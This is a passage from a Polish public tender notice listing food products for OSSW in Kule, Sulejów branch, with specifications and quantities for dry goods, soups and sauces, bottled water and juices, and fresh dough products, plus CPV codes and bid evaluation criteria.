psucia, zawilgocenie, obecność szkodników żywych, martwych oraz ich pozostałości. Opakowanie jednostkowe - 1 kg. Termin przydatności do spożycia nie mniej niż 180 dni od daty dostawy. kg 120 36 Ryż biały Ryż długoziarnisty. Cechy dyskwalifikujące: obce zapachy, posmaki, zanieczyszczenia, objawy pleśnienia, psucia, zawilgocenie, obecność szkodników żywych, martwych oraz ich pozostałości. Opakowanie jednostkowe - 1 kg. kg 70 37 Mąka pszenna Mąka pszenna typ 500, o zawartości mokrego glutenu co najmniej 25%. Produkt spożywczy, otrzymany przez rozdrobnienie oczyszczonych ziaren pszenicy zwyczajnej, struktura i konsystencja- sypka, rozdrobniona bez grudek, barwa biała z odcieniem żółtym, wilgotność nie większa niż 15,0%, kwasowość mierzona w stopniach nie większa niż 6. Cechy dyskwalifikujące: obce posmaki, zapachy, np.: stęchły, gorzki, zanieczyszczenia mechaniczne i organiczne, cząstki kąkolu, objawy pleśnienia, psucia, zawilgocenie, obecność szkodników żywych, martwych oraz ich pozostałości. Opakowanie jednostkowe- torba papierowa 1kg. Termin przydatności do spożycia nie mniej niż 180 dni od daty dostawy. kg 150 38 Kasza jęczmienna pęczak Produkt otrzymany z jęczmienia, struktura i konsystencja- sypka, bez grudek i wilgotności nie większa niż 15,3%, kwasowość mierzona w stopniach nie większa niż 3. Cechy dyskwalifikujące: obce zapachy, posmaki, zanieczyszczenia, objawy pleśnienia, psucia, zawilgocenie, obecność szkodników żywych, martwych oraz ich pozostałości. Opakowanie jednostkowe - 1 kg. Termin przydatności do spożycia nie mniej niż 180 dni od daty dostawy. kg 150 39 Kasza jęczmienna Produkt otrzymany z jęczmienia, struktura i konsystencja- sypka, bez grudek i wilgotności nie większa niż 15,3%, kwasowość mierzona w stopniach nie większa niż 3. Cechy dyskwalifikujące: obce zapachy, posmaki, zanieczyszczenia, objawy pleśnienia, psucia, zawilgocenie, obecność szkodników żywych, martwych oraz ich pozostałości. Opakowanie jednostkowe - 1 kg. Termin przydatności do spożycia nie mniej niż 180 dni od daty dostawy. kg 50 40 Kasza gryczana Produkt otrzymany z gryki, struktura i konsystencja- sypka, bez grudek i wilgotności nie większa niż 15,3%, kwasowość mierzona w stopniach nie większa niż 3. Cechy dyskwalifikujące: obce zapachy, posmaki, zanieczyszczenia, objawy pleśnienia, psucia, zawilgocenie, obecność szkodników żywych, martwych oraz ich pozostałości. Opakowanie jednostkowe - 1 kg. Termin przydatności do spożycia nie mniej niż 180 dni od daty dostawy. kg 150 41 Kasza manna Produkt otrzymany z pszenicy, struktura i konsystencja- sypka, bez grudek i wilgotności nie większa niż 15,3%, kwasowość mierzona w stopniach nie większa niż 3. Cechy dyskwalifikujące: obce zapachy, posmaki, zanieczyszczenia, objawy pleśnienia, psucia, zawilgocenie, obecność szkodników żywych, martwych oraz ich pozostałości. Opakowanie jednostkowe -1 kg. Termin przydatności do spożycia nie mniej niż 180 dni od daty dostawy. kg 10 42 Płatki czekoladowe Płatki zbożowe o smaku czekoladowym, otrzymane przez przetworzenie ziaren zbóż. Struktura i konsystencja- sypka, w postaci drobnych różnokształtnych płatków bez grudek płatki niepokruszone, barwa żółta, smak lekki słodki. Cechy dyskwalifikujące: obce posmaki, zapachy, zanieczyszczenia mechaniczne i organiczne, objawy pleśnienie, psucia, zawilgocenia, obecność szkodników żywych, martwych oraz ich pozostałości. Opakowanie jednostkowe- folia hermetycznie zamknięta ok. 250 g. Termin przydatności do spożycia nie mniej niż 180 dni od daty dostawy. kg 150 43 Płatki kukurydziane Płatki kukurydziane otrzymane przez przetworzenie ziaren kukurydzy. Struktura i konsystencja- sypka, w postaci drobnych różnokształtnych płatków bez grudek płatki niepokruszone, barwa żółta, smak lekki słodki. Cechy dyskwalifikujące: obce posmaki, zapachy, zanieczyszczenia mechaniczne i organiczne, objawy pleśnienie, psucia, zawilgocenia, obecność szkodników żywych, martwych oraz ich pozostałości. Opakowanie jednostkowe- folia hermetycznie zamknięta ok. 250 g. Termin przydatności do spożycia nie mniej niż 180 dni od daty dostawy. kg 120 44 Syrop owocowy Skład: cukier lub syrop glukozowy - fruktozowy zagęszczony sok (w zależności od smaku; np.: żurawinowy, aroniowy, malinowy, wiśniowy), woda, kwas cytrynowy, regulator kwasowości, aromat, witamina C, substancja wzbogacająca. Syrop bez konserwantów, pasteryzowany. Opakowanie jednostkowe: butelka szklana bezzwrotna o pojemności ok. 0,42 litra. Termin przydatności do spożycia powinien wynosić nie mniej niż 180 dni od daty dostawy. l 10 45 Mąka ziemniaczana Skrobia ziemniaczana otrzymana z bulw ziemniaczanych; struktura i konsystencja- sypka, drobnoziarnisty proszek bez grudek , barwa białą. Cechy dyskwalifikujące: obce posmaki, zapachy, np.: stęchły, gorzki, zanieczyszczenia mechaniczne i organiczne, cząstki kąkolu, objawy pleśnienia, psucia, zawilgocenie, obecność szkodników żywych, martwych oraz ich pozostałości. Opakowanie jednostkowe- torba papierowa 500 g-1 kg. Termin przydatności do spożycia nie mniej niż 180 dni od daty dostawy. kg 30 46 Żelatyna spożywcza Żelatyna spożywcza. Op. Jedn. 30 - 50g. Termin przydatności do spożycia powinien wynosić nie mniej niż 180 dni od daty dostawy. kg 2 47 Kwasek cytrynowy Kwasek cytrynowy spożywczy. Kryształy sypkie, bez zlepów i grudek. Kryształy bezbarwne bez obcego zapachu. Smak kwaśny Op. jedn do 100g. Termin przydatności do spożycia powinien wynosić nie mniej niż 180 dni od daty dostawy. kg 1 48 Ciastka kruche Ciasteczka różne smaki i kształty. Składniki: mąka pszenna, tłuszcz roślinny utwardzony, cukier, skrobia ziemniaczana, kakao niskotłuszczowe, glukoza w proszku, żółtko jaja w proszku, czekolada, sól spożywcza, substancje spulchniające, aromat. Mogą zawierać śladowe ilości orzechów oraz tłuszcz mleczny. Opakowanie: pudełko kartonowe kolorowane z nadrukiem. Waga ok. 2 kg. Termin przydatności do spożycia powinien wynosić nie mniej niż 180 dni od daty dostawy. kg 10 49 Groszek ptysiowy Op. Jedn. 100g - 1 kg. Składniki: mąka psz. tłuszcz roślinny, sól, jaja w proszku, mleko odtłuszcz. w proszku, drożdże. Termin przydatności do spożycia nie mniej niż 180 dni od daty dostawy. kg 30 50 Rogal z nadzieniem Mąka pszenna, nadzienie o smaku kakaowym ok. 23% tłuszcz roślinny, syrop glukozowy, cukier, tłuszcze roślinne, aromaty, oleje roślinne tłuszcz roślinny, syrop glukozowy, cukier, tłuszcze roślinne, aromaty, substancja konserwująca, tłuszcz roślinny, cukier, oleje roślinne. Opakownaie jedn. ok. 60g. Termin przydatności do spożycia powinien wynosić minimum 180 dni od daty dostawy. kg 60 51 Paluszki solone Paluszki solone w op.100g. Termin przydatności do spożycia nie mniej niż 180 dni od daty dostawy. kg 2 52 Grzanki Op. jedn. 100g -1kg. Grzanki ziołowo-czosnkowe. Składniki: chleb pszenny ( mąka pszenna, tłuszcz roślinny, sól, drożdże), tłuszcz roślinny, aromaty. Termin przydatności do spożycia nie mniej niż 180 dni od daty dostawy. kg 30 53 Herbatniki Składniki: mąka pszenna, cukier, tłuszcz roślinny utwardzony, skrobia ziemniaczana, cukier inwertowany, serwatka w proszku (z mleka), lecytyna sojowa, sól, substancje spulchniające, regulator kwasowości, aromat (wanilia). Może zawierać śladowe ilości mleka, orzechów arachidowych, laskowych i migdałów. Opakowanie jednostkowe: folia przeźroczysta z nadrukiem, waga 50 g - 100 g. Termin przydatności do spożycia powinien wynosić nie mniej niż 180 dni od daty dostawy. kg 10 54 Cukier waniliowy Skład: cukier, aromat waniliowy. Opakowanie jednostkowe: folia aluminiowa z nadrukiem, waga ok. 20 g. Termin przydatności do spożycia powinien wynosić minimum 180 dni od daty dostawy. kg 1 55 Cukier Cukier biały. Op. jedn. 1 kg. Termin przydatności do spożycia nie mniej niż 180 dni od daty dostawy. kg 1000 56 Miód porcjowany Miód pszczeli nektarowy wielokwiatowy NK. Op.jedn.25g. Termin przydatności do spożycia nie mniej niż 180 dni od daty dostawy. kg 30 57 Napój kakaowy Kakao rozpuszczalne o mocno czekoladowym smaku z witaminami i składnikami mineralnymi. Op.jedn.300g. Termin przydatności do spożycia nie mniej niż 180 dni od daty dostawy. kg 24 58 Krem czekoladowy Skład: cukier, olej roślinny, orzechy laskowe (13%), odtłuszczone kakao (7,4%), odtłuszczone mleko w proszku (5%), laktoza, serwatka w proszku, emulgator: lecytyna sojowa, aromat. Opakowanie jednostkowe z tworzywa sztucznego dopuszczonego do żywności. Waga 20 g - 25 g. Termin przydatności do spożycia powinien wynosić nie mniej niż 180 dni od daty dostawy. kg 30 59 Wafelek w czekoladzie Wafelek w czekoladzie op.35-45g. Termin przydatności do spożycia nie mniej niż 180 dni od daty dostawy. szt. 1500 60 Makaron gruby Makaron jajeczny (kolanka, łazanki, świderki, muszelki, rurki, wstążki). Produkowany z świeżych jaj i najwyższej jakości mąki ,Cechy dyskwalifikujące: obce posmaki, zapachy (np. stęchły, pleśni, gorzki), zanieczyszczenia mechaniczne i organiczne, objawy pleśnienia, psucia, zawilgocenia, obecność szkodników żywych, martwych oraz pozostałości. Op. Jedn. 250g-2kg. Termin przydatności do spożycia nie mniej niż 180 dni od daty dostawy. kg 400 61 Makaron nitki Makaron jajeczny. Produkowany z świeżych jaj i najwyższej jakości mąki ,Cechy dyskwalifikujące: obce posmaki, zapachy (np. stęchły, pleśni, gorzki), zanieczyszczenia mechaniczne i organiczne, objawy pleśnienia, psucia, zawilgocenia, obecność szkodników żywych, martwych oraz pozostałości. Op. Jedn. 250g-2kg. Termin przydatności do spożycia nie mniej niż 180 dni od daty dostawy. kg 70 62 Zacierki Makaron jajeczny zacierka. Skład: mąka pszenna, woda, jaja nie mniej niż 9% (2 jaja /1 kg mąki). Op. Jedn. 250 -500g. Termin przydatności do spożycia nie mniej niż 180 dni od daty dostawy. kg 10 63 Kawa rozpuszczalna Kawa rozpuszczalna naturalna 100%, aglomerowana. Op. jedn. 100g - 200g. Termin przydatności do spożycia nie mniej niż 180 dni od daty dostawy. kg 10 64 Kawa naturalna Kawa naturalna 100% pakowana próżniowo, mielona. Op. jedn. 100g -250g. Termin przydatności do spożycia nie mniej niż 180 dni od daty dostawy. kg 10 65 Herbata expresowa Herbata expresowa - torebki w kopertkach i ze sznureczkiem. Op. Podst.2g Op. Zbiorcze 50g, 100g, 200g. kg 100 66 Herbata expresowa (b.s.) Herbata expresowa - torebki bez sznureczka Op. Podst.1,4g Op. Zbiorcze 28g, 70g, 140g. kg 10 67 Liść laurowy Liść laurowy suszony. Op.jedn.5-10g. Termin przydatności do spożycia powinien wynosić nie mniej niż 180 dni od daty dostawy. kg 1 68 Majeranek Przyprawa ziołowa. Mieszanina liści i kwiatów o intensywnym, charakterystycznym zapachu i smaku. Op.jedn.7-10g. Termin przydatności do spożycia powinien wynosić nie mniej niż 180 dni od daty dostawy. kg 3 69 Papryka mielona słodka Papryka mielona. Barwa czerwona. Smak słodkawy lub piekący, mało wyczuwalny. Op. Jedn. 20 - 100g. Termin przydatności do spożycia powinien wynosić nie mniej niż 180 dni od daty dostawy. kg 1 70 Ziele angielskie Ziele angielskie - przyprawa ziołowa. Op. Jedn. 10g -20g. Termin przydatności do spożycia powinien wynosić nie mniej niż 180 dni od daty dostawy. kg 1 71 Przyprawa curry Kompozycja ziół, przypraw i suszonych warzyw o charakterystycznym, pikantnym aromacie i smaku. Op. jedn 20-40g. Termin przydatności do spożycia powinien wynosić nie mniej niż 180 dni od daty dostawy. kg 1 72 Czosnek granulowany Przyprawa o charakteryst. smaku i aromacie do tłust. mięs, zup i sosów. Op. Jedn. 20-40g. Termin przydatności do spożycia powinien wynosić nie mniej niż 180 dni od daty dostawy. kg 1 73 Kurkuma Kurkuma suszona. Op.jedn.5-10g. Termin przydatności do spożycia powinien wynosić nie mniej niż 180 dni od daty dostawy. kg 1 74 Ocet spirytus. 10% Op. Jedn. 0,5 l . Termin przydatności do spożycia powinien wynosić nie mniej niż 180 dni od daty dostawy. l 20 75 Ketchup Ketchup o smaku łagodnym. Op. jedn. 400-500g. Skład: koncentrat pomidorowy nie mniej niż 37%, woda, cukier, ocet, skrobia mody. Sól. Termin przydatności do spożycia nie mniej niż 180 dni od daty dostawy. kg 150 76 Musztarda delikatesowa stołowa Op.jedn.380g-500g, tuba z tworzywa sztucznego. Skład: woda, gorczyca, ocet, sól. Termin przydatności do spożycia nie mniej niż 180 dni od daty dostawy. kg 100 77 Przyprawa do potraw uniwersalna Przyprawa warzywna do zup, potraw mięsnych i ryb. Skład: zawartość soli nie więcej niż55%, warzywa suszone nie mniej niż15%, marchew, cebula, pasternak, seler, natka pietruszki, por, substancje wzmacniające smak i zapach.; cukier pieprz czarny, ekstrakt drożdżowy. Op .jedn. 150 - 200g. Termin przydatności do spożycia powinien wynosić nie mniej niż 180 dni od daty dostawy. kg 100 78 Delikata do ryb Op. Jedn. 0,5-1kg. Składniki: sól, cebula suszona 18%, substancja wzmacniająca smak i zapach: glutaminian sodu; pieprz, natka pietruszki, koper, mąka pszenna, regulator kwasowości: kwas cytrynowy, czosnek 2,3%, olej roślinny, tymianek, imbir. Termin przydatności do spożycia powinien wynosić nie mniej niż 180 dni od daty dostawy. kg 2 79 Delikata do kurczaka Op. Jedn. 0,5kg -1kg. Składniki: substancja wzmacniająca smak i zapach: glutaminian sodu, sól, mąka pszenna, papryka mielona, czosnek, natka pietruszki, rozmaryn, pieprz, oregano, tymianek, majeranek, papryka ostra, cebula suszona, cukietr, pomidory suszone, olej roślinny, barwniki: karmel amoniakalny,, ekstrakt z papryki, aromat, substancja przeciwzbrylająca: dwutlenek krzemu. Przyprawa bez konserwntów. Termin przydatności do spożycia powinien wynosić nie mniej niż 180 dni od daty dostawy. kg 5 80 Przyprawa do karczku Op. Jedn. 0,2 kg -1kg. Skład: czosnek, sól, cebula, papryka słodka, gorczyca, pietruszka, curry, pieprz mielony, majeranek, cząber, kminek, ziele angielskie, liść laurowy. Przyprawa bez konserwntów. Termin przydatności do spożycia powinien wynosić nie mniej niż 180 dni od daty dostawy. kg 4 81 Przyprawa do wołowiny Op. Jedn. 0,2 kg -1kg.Składniki: sól kuchenna, czosnek, cebula, papryka słodka, pieprz czarny, seler, papryka ostra, cukier, rozmaryn, gałka muszkatołowa, curry, imbir, natka pietruszki. Przyprawa bez konserwntów. Termin przydatności do spożycia powinien wynosić nie mniej niż 180 dni od daty dostawy. kg 2 82 Majonez dekoracyjny Majonez dekoracyjny. Składniki: olej roślinny, żółtko jaja nie mniej niż 6,0%, ocet, musztarda (woda, gorcz. ocet, sól, cukier). Op. jedn. 400-800ml. Termin przydatności do spożycia nie mniej niż 180 dni od daty dostawy. l 160 83 Gałka muszkatołowa Gałka muszkat. mielona. Op. Jedn. 10g. Termin przydatności do spożycia powinien wynosić nie mniej niż 180 dni od daty dostawy. kg 1 84 Cynamon Cynamon mielony. Barwa jasnobrązowa do brunatnej, jednolita. Zapach swoisty, intensywny, bez zapachów obcych. Smak słodko- piekący, bez posmaków obcych. Przyprawa o silnym balsamicznym zapachu oraz ostrym, korzennym, gorzkawym i zarazem słodkim smaku. Op. Jedn. 15-20g. Termin przydatności do spożycia powinien wynosić nie mniej niż 180 dni od daty dostawy. kg 1 85 Pieprz czarny mielony Pieprz czarny mielony. Przyprawa o charakterystycznym ostrym smaku, stosowana do wszelkiego rodzaju potraw mięsnych i rybnych, zup, bulionów, sosów, warzyw oraz sałatek i marynat. Op. Jedn. 5-25g. Termin przydatności do spożycia powinien wynosić nie mniej niż 180 dni od daty dostawy. kg 3 86 Pieprz czarny cały Pieprz czarny naturalny. Przyprawa o charakterystycznym ostrym smaku, stosowana do wszelkiego rodzaju potraw mięsnych i rybnych, zup, bulionów, sosów, warzyw oraz sałatek i marynat. Op. Jedn. 5-25g. Termin przydatności do spożycia powinien wynosić nie mniej niż 180 dni od daty dostawy. kg 3 87 Pieprz ziołowy Pieprz ziołowy. Przyprawa o charakterystycznym ziołowym smaku, stosowana do wszelkiego rodzaju potraw mięsnych i rybnych, zup, bulionów, sosów, warzyw oraz sałatek i marynat. Op. Jedn. 5-25g. Termin przydatności do spożycia powinien wynosić nie mniej niż 180 dni od daty dostawy. kg 2 88 Sól jodowana Sól warzona, próżniowa, jodowana do celów spożywcza. Składniki: chlorek sodu (NaCl) min. 99,0 %. Substancja przeciwzbryl. E 536 do 1 mg/100g, Jodan potasu 3,9?1,3 mg/100g. Op. jedn. 1 kg. Termin przydatności do spożycia powinien wynosić nie mniej niż 180 dni od daty dostawy. kg 200 89 Imbir Imbir suszony. Op.jedn.5-10g. Termin przydatności do spożycia powinien wynosić nie mniej niż 180 dni od daty dostawy. kg 1 90 Żurek w płynie Op. jedn. butelka 0,5 l. Termin przydatności do spożycia nie mniej niż 180 dni od daty dostawy. Termin przydatności do spożycia nie mniej niż 180 dni od daty dostawy. l 80 91 Przyprawa do zup w płynie uniwersalna Skład: hydrolizat białkowy, glutaminian, sól, woda, przyprawy smakowe. Op. Jedn. 1 kg. Termin przydatności do spożycia powinien wynosić nie mniej niż 180 dni od daty dostawy. kg 200.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6, 15.33.00.00-0, 15.60.00.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. najkrótszy czas wymiany wadliwego towaru - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Dostawy  zup i sosów dla OSSW  w Kulach  Oddział Zamiejscowy w Sulejowie..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1 Sosy sałatkowe Składniki: laktoza, sól, cukier, regulatory kwasowości (kwas cytrynowy, dioctan sodu), substancja wzmacniająca smak i zapach (glutaminian sodu), skrobia modyfikowana, natka pietruszki, gorczyca, szczypiorek, cebula, olej roślinny, ekstrakt drożdżowy, pieprz, kurkuma, czosnek, aromaty. Masa netto do 1,20 kg. Opakowanie: pojemnik z tworzywa sztucznego. Termin przydatności do spożycia powinien wynosić nie mniej niż 180 dni od daty dostawy. kg 5 2 Sos z zielonym pieprzem Składniki: zasmażka (mąka pszenna, tłuszcz roślinny, barwnik, karmel), skrobia modyfikowana, sól, tłuszcz roślinny, substancje wzmacniające smak i zapach: glutaminian sodu, guanylan disodowy i inozynian disodowy, aromaty (w tym sezam), ekstrakt drożdżowy suszony, cukier, pieprz zielony CAŁY liofilizowany , pieprz, maltodekstryna, sos sojowy suszony (w tym pszenica), czosnek, barwnik karmel , majeranek. Masa netto do 1,20 kg. Opakowanie: pojemnik z tworzywa sztucznego. Termin przydatności do spożycia powinien wynosić nie mniej niż 180 dni od daty dostawy. kg 8 3 Sos do makaronu Carbonara Składniki: śmietanka w proszku, zasmażka, ser w proszku, skrobia, maltodekstryna, , boczek wędzony wieprzowy, żółtko jaja kurzego w proszku, aromaty, ekstrakty drożdżowe, , tłuszcz roślinny, sól, serwatka, cukier, czosnek, natka pietruszki, drożdże wędzone, kurkuma, aromat dymu wędzarniczego. Masa netto do 1,20 kg. Opakowanie: pojemnik z tworzywa sztucznego. Termin przydatności do spożycia powinien wynosić nie mniej niż 180 dni od daty dostawy. kg 15 4 Sos do makaronu Bolognese Składniki: koncentrat pomidorowy, tłuszcz roślinny, mąka ryżowa, maltodekstryna, cukier, cebula, sól jodowana, skrobia modyfikowana, ekstrakty drożdżowe, czosnek, syrop karmelowy, papryka czerwona, skrobia, tymianek, rozmaryn, oregano, majeranek, aromaty. Masa netto do 1,20 kg. Opakowanie: pojemnik z tworzywa sztucznego. Termin przydatności do spożycia powinien wynosić nie mniej niż 180 dni od daty dostawy. kg 20 5 Sos biały baza Składniki: tłuszcz palmowy, mąka pszenna, skrobia, sól, sól jodowana, laktoza, cukier, białka mleka, ekstrakty drożdżowe, aromaty, cebula, liść laurowy w proszku, może zawierać jaja i seler, regulatory kwasowości (octany sodu, mleczan wapnia), kwas cytrynowy, mlekowy. Masa netto od 900g - 940g. Opakowanie jednostkowe: pojemnik z tworzywa sztucznego. Termin przydatności do spożycia nie mniej niż 180 dni od daty dostawy. kg 20 6 Barszcz biały Składniki: skrobia, mleko odtłuszczone w proszku, mąka żytnia (nie mniej niż14,6%), sól, płatki ziemniaczane, boczek wieprzowy wędzony, prażony (nie mniej niż 5,5%), tłuszcz roślinny, substancje wzmacniające smak i zapach: glutaminian sodu, inozynian disodowy, guanylan disodowy, cukier, aromaty, regulator kwasowości: kwas cytrynowy, cebula prażona, ekstrakt drożdżowy suszony (w tym pszenica), majeranek, liść laurowy, pieprz. Waga do 1,40 kg. Opakowanie jednostkowe: pojemnik z tworzywa sztucznego. Termin przydatności do spożycia nie mniej niż 180 dni od daty dostawy. kg 10 7 Zupa pieczarkowa Składniki: mąka pszenna, tłuszcz roślinny, skrobia, maltodekstryna, laktoza, sól, białka mleka, ekstrakt grzybowy, pieczarki suszone, substancje wzmacniające smak i zapach, maślaki, cebula, ekstrakt z pieczarek suszonych, aromaty, natka pietruszki, pieprz czarny. Masa netto do 3 kg. Opakowanie: pojemnik z tworzywa sztucznego. Termin przydatności do spożycia powinien wynosić nie mniej niż 180 dni od daty dostawy. kg 15 8 Zupa porowa Składniki: mąka pszenna, tłuszcz roślinny, sól, skrobia, por suszony, substancja wzmacniająca smak i zapach, cebula suszona, stabilizator, czosnek, aromat, laktoza, białka mleka, gałka muszkatołowa, kurkuma. Masa netto do 3 kg. Opakowanie: pojemnik z tworzywa sztucznego. Termin przydatności do spożycia powinien wynosić nie mniej niż 180 dni od daty dostawy. kg 15 9 Zupa brokułowa Składniki: Mąka pszenna, sól, tłuszcz roślinny, laktoza, maltodekstryna, brokuły, substancje wzmacniające smak i zapach, białka mleka, cukier, aromaty, cebula, ekstrakt drożdżowy, pieprz, kurkuma, gałka muszkatołowa. Masa netto do 1,40 kg. Opakowanie: pojemnik z tworzywa sztucznego. Termin przydatności do spożycia powinien wynosić nie mniej niż 180 dni od daty dostawy. kg 15 10 Zupa cebulowa Składniki: mąka pszenna, tłuszcz roślinny, sól, skrobia, substancja wzmacniająca smak i zapach, cebula suszona, stabilizator, czosnek, aromat, laktoza, białka mleka, gałka muszkatołowa, kurkuma. Masa netto do 1,4 kg. Opakowanie: pojemnik z tworzywa sztucznego. Termin przydatności do spożycia powinien wynosić nie mniej niż 180 dni od daty dostawy. kg 10 11 Krem z borowików Składniki: mąka pszenna, tłuszcz roślinny, skrobia, maltodekstryna, laktoza, sól, białka mleka, ekstrakt grzybowy, borowiki, substancje wzmacniające smak i zapach, maślaki, cebula, ekstrakty drożdżowe, aromaty, natka pietruszki, pieprz czarny. Masa netto do 1,40 kg. Opakowanie: pojemnik z tworzywa sztucznego. Termin przydatności do spożycia powinien wynosić nie mniej niż 180 dni od daty dostawy. kg 15 12 Bulion drobiowy Bulion drobiowy w kostkach 10g; składniki: sól, tłuszcz roślinny utwardzony, aromaty, olej roślinny, substancje wzmacniające smak i zapach, ekstrakt drożdżowy, maltodekstryna, suszone warzywa (cebula, marchew), cukier, przyprawy, ekstrakt mięsa drobiowego (nie mniej niż 0,50%), mięso drobiowe suszone (nie mniej niż 0,10%), koncentrat czosnku, regulator kwasowości: kwas cytrynowy, gluten, seler. Może zawierać śladowe ilości soi. Opakowanie jednostkowe: pudełko kartonowe do 0,200 kg. Termin przydatności do spożycia powinien wynosić nie mniej niż 180 dni od daty dostawy. kg 10 13 Bulion wołowy Bulion wołowy w kostkach 10g; składniki: sól, tłuszcz roślinny utwardzony, aromaty, olej roślinny, substancje wzmacniające smak i zapach, ekstrakt drożdżowy, maltodekstryna, suszone warzywa (cebula, marchew), cukier, przyprawy, ekstrakt mięsa drobiowego (nie mniej niż 0,50%), mięso wołowe suszone (nie mniej niż 0,10%), koncentrat czosnku, regulator kwasowości: kwas cytrynowy, gluten, seler. Może zawierać śladowe ilości soi. Opakowanie jednostkowe: pudełko kartonowe do 0,200 kg. Termin przydatności do spożycia powinien wynosić nie mniej niż 180 dni od daty dostawy. kg 10.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.87.12.00-6, 15.89.14.00-4, 15.89.15.00-5, 15.87.12.60-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. najkrótszy czas wymiany wadliwego towaru - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Dostawy wody i soków dla OSSW w Kulach Oddział Zamiejscowy w Sulejowie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1 Naturalna woda mineralna niegazowana / gazowana 0,50 litra Naturalna woda mineralna nasycona lub nienasycona dwutlenkiem węgla. Barwa - bezbarwny płyn, klarowny, bez osadów i innych zanieczyszczeń. Smak i zapach - bez obcych posmaków, bezwonna. Woda pochodząca z udokumentowanych zasobów podziemnych o naturalnym stabilnym składzie mineralnym izolowanym nakładem geologicznym chroniącym zasób od zanieczyszczeń z monitorowanych ujęć. Opakowanie jednostkowe: butelki z tworzywa sztucznego typu PET 0,50 litra. Termin przydatności do spożycia powinien wynosić nie mniej niż 180 dni od daty dostawy. litr 500 2 Naturalna woda mineralna niegazowana/gazowana 1,50 litra Naturalna woda mineralna nasycona lub nienasycona dwutlenkiem. Barwa - bezbarwny płyn, klarowny, bez osadów i innych zanieczyszczeń. Smak i zapach - bez obcych posmaków, bezwonna. Woda pochodząca z udokumentowanych zasobów podziemnych o naturalnym stabilnym składzie mineralnym izolowanym nakładem geologicznym chroniącym zasób od zanieczyszczeń z monitorowanych ujęć. Opakowanie jednostkowe: butelki z tworzywa sztucznego typu PET 1,50 litra. Termin przydatności do spożycia powinien wynosić nie mniej niż 180 dni od daty dostawy. litr 1500 3 Naturalna woda mineralna niegazowana 5 litrów Naturalna woda mineralna nie nasycona dwutlenkiem węgla spełniające wymagania Ministra Zdrowia. Barwa - bezbarwny płyn, klarowny, bez osadów i innych zanieczyszczeń. Smak i zapach - bez obcych posmaków, bezwonna. Woda pochodząca z udokumentowanych zasobów podziemnych o naturalnym stabilnym składzie mineralnym izolowanym nakładem geologicznym chroniącym zasób od zanieczyszczeń z monitorowanych ujęć. Opakowanie jednostkowe: butelki z tworzywa sztucznego typu PET 5 litrów. Termin przydatności do spożycia powinien wynosić nie mniej niż 180 dni od daty dostawy litr 2000 4 Napoje owocowe Napój owocowy: jabłkowy, pomarańczowy, grejpfrutowy, z czarnej porzeczki, produkowany z soku owoców lub zagęszczonego soku owocowego zawierający naturalne składniki smakowo-aromatyczne, niegazowany, zdolny do fermentacji, lecz niesfermentowany, otrzymany przez dodanie wody i cukru lub substancji słodzących. Konsystencja płynna, zawartość ekstraktu nie mniej niż 10%. Barwa charakterystyczna dla użytych składników, klarowna, bez osadów i innych zanieczyszczeń. Smak i zapach charakterystyczny dla owoców. Opakowanie jednostkowe: kartoniki wielowarstwowe, powlekane, termozgrzewalne Pojemność 1 litr. Termin przydatności do spożycia nie mniej niż 180 dni od daty dostawy. litr 300 5 Sok owocowy 200 ml Sok owocowy pomarańczowy, jabłkowy, z czarnej porzeczki, produkowany z soku owoców lub zagęszczonego soku owocowego zawierający naturalne składniki smakowo-aromatyczne, niegazowany, zdolny do fermentacji, lecz niesfermentowany, otrzymany przez dodanie wody i miodu. Konsystencja płynna, zawartość ekstraktu nie mniej niż 10%. Barwa charakterystyczna dla użytych składników, klarowna, bez osadów i innych zanieczyszczeń. Smak i zapach charakterystyczny dla owoców. Kartonik 0,20 litra z przyklejoną słomką. Termin przydatności do spożycia nie mniej niż 180 dni od daty dostawy. litr 100.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.98.10.00-8, 15.98.20.00-5, 15.98.21.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. najkrótszy czas wymiany wadliwego towaru - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Dostawy produktów mącznych dla OSSW w Kulach Oddział Zamiejscowy w Sulejowie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1 Pierogi składniki: ciasto pierogowe z farszem mięsnym, warzywno-mięsnym, serowym, owocowym lub z grzybami; opakowanie jednostkowe: tacka styropianowa + folia spożywcza; okres przydatności do spożycia: 72 godziny od chwili wyprodukowania; waga ok. 400 g (8 szt.). Produkt świeży, nie mrożony. kg 400 2 Kopytka - kluski ziemniaczane składniki: ziemniaki, mąka pszenna, mąka ziemniaczana, jaja, sól; opakowanie jednostkowe: tacka styropianowa + folia spożywcza; okres przydatności do spożycia: 72 godziny od daty dostawy; waga ok. 500 g (20 szt.). Produkt świeży, niemrożony. kg 100 3 Krokiety skłądniki: ciasto naleśnikowe z farszem :pieczarka z kapustą lub z mięsem; opakowanie jednostkowe: tacka styropianowa + folia spożywcza.; okres przydatności do spożycia: 72 godziny od daty dostawy; waga ok. 500 g (4 szt.). Produkt świeży, niemrożony . kg 200 4 Naleśniki składniki: ciasto naleśnikowe z farszem z sera lub z owoców; opakowanie 